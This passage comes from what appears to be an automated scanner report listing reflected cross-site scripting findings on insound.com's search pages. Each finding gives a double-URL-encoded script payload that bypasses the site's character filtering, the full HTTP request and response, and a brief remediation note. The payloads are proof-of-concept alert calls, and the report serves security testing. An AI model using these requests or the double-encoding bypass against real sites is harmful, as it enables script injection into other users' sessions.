Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Julio%20Bashmorea2c3a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc9d6a819a5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m7a420fnommr775gb176v0eus2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:00 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=446870310; expires=Sun, 09-Jan-2011 02:41:00 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=76962806; expires=Sun, 09-Jan-2011 02:41:00 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Julio Bashmorea2c3a"><script>alert(1)</script>fc9d6a819a5" />
...[SNIP]...

1.161. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J..nsi&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7ccdf%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f852360fdf was submitted in the REST URL parameter 3. This input was echoed as 7ccdf</title><script>alert(1)</script>6f852360fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J7ccdf%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f852360fdf..nsi&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ohm63kc8mes205fb5tnci35m47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=278972899; expires=Sun, 09-Jan-2011 02:40:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=8301769; expires=Sun, 09-Jan-2011 02:40:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>J7ccdf</title><script>alert(1)</script>6f852360fdf..nsi</title>
...[SNIP]...

1.162. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J..nsi&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69e453be2c1 was submitted in the REST URL parameter 3. This input was echoed as 7de97"><script>alert(1)</script>69e453be2c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J7de97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69e453be2c1..nsi&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e311sjfc96gdr6ai01al6k79d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48822784; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=23335057; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="J7de97"><script>alert(1)</script>69e453be2c1..nsi" />
...[SNIP]...

1.163. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kanye%20West&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb080eef1911 was submitted in the REST URL parameter 3. This input was echoed as aac47"><script>alert(1)</script>b080eef1911 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kanye%20Westaac47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb080eef1911&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3vl6i9b0o4s3glgvu38vvqj0o6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=27829969; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=495312237; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Kanye Westaac47"><script>alert(1)</script>b080eef1911" />
...[SNIP]...

1.164. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kanye%20West&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 5ee68%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bdf6443693 was submitted in the REST URL parameter 3. This input was echoed as 5ee68</title><script>alert(1)</script>0bdf6443693 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kanye%20West5ee68%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bdf6443693&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=314muu0a19snilpbkfl115rqj3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=81453150; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=95018968; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Kanye West5ee68</title><script>alert(1)</script>0bdf6443693</title>
...[SNIP]...

1.165. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kingdom&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4b00b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbb23efea84 was submitted in the REST URL parameter 3. This input was echoed as 4b00b</title><script>alert(1)</script>bbb23efea84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kingdom4b00b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbb23efea84&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=j5mr4i5vnqsr1a5sf8fvv2asf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=63916027; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=284097053; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Kingdom4b00b</title><script>alert(1)</script>bbb23efea84</title>
...[SNIP]...

1.166. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Kingdom&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef31507bff75 was submitted in the REST URL parameter 3. This input was echoed as f5b43"><script>alert(1)</script>f31507bff75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Kingdomf5b43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef31507bff75&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=v221qk7rs6rkojp3n1483lr9b4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=401865232; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=157031852; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Kingdomf5b43"><script>alert(1)</script>f31507bff75" />
...[SNIP]...

1.167. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Koen%20Holtkamp&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3594%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6465df9e081 was submitted in the REST URL parameter 3. This input was echoed as b3594"><script>alert(1)</script>6465df9e081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Koen%20Holtkampb3594%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6465df9e081&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n2j1qmm8pq7hirfpbmomol7ae3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=116924241; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=318663680; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Koen Holtkampb3594"><script>alert(1)</script>6465df9e081" />
...[SNIP]...

1.168. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Koen%20Holtkamp&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b29c3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee09ffc5f078 was submitted in the REST URL parameter 3. This input was echoed as b29c3</title><script>alert(1)</script>e09ffc5f078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Koen%20Holtkampb29c3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee09ffc5f078&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=btdd4254ut68bojhoa7685d9m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=359921856; expires=Sun, 09-Jan-2011 02:40:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=371574253; expires=Sun, 09-Jan-2011 02:40:25 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Koen Holtkampb29c3</title><script>alert(1)</script>e09ffc5f078</title>
...[SNIP]...

1.169. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/LCD%20Soundsystem&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 36a28%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead92594b897 was submitted in the REST URL parameter 3. This input was echoed as 36a28</title><script>alert(1)</script>ad92594b897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/LCD%20Soundsystem36a28%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead92594b897&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cma30a42gpg3r47ah7knkfejh5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=227670833; expires=Sun, 09-Jan-2011 02:41:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=182090187; expires=Sun, 09-Jan-2011 02:41:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>LCD Soundsystem36a28</title><script>alert(1)</script>ad92594b897</title>
...[SNIP]...

1.170. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/LCD%20Soundsystem&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b248a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fcf689f5c8 was submitted in the REST URL parameter 3. This input was echoed as b248a"><script>alert(1)</script>5fcf689f5c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/LCD%20Soundsystemb248a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fcf689f5c8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ehq45ctu3fb968jlga0jr1s866; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=386945573; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=536046806; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="LCD Soundsystemb248a"><script>alert(1)</script>5fcf689f5c8" />
...[SNIP]...

1.171. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Les%20Sins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ef034ef7b was submitted in the REST URL parameter 3. This input was echoed as d8f77"><script>alert(1)</script>a1ef034ef7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Les%20Sinsd8f77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ef034ef7b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=dvfrm6j00ifq5aj87qt091fu37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=473099195; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=501671464; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Les Sinsd8f77"><script>alert(1)</script>a1ef034ef7b" />
...[SNIP]...

1.172. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Les%20Sins&from=47597/

Issue detail

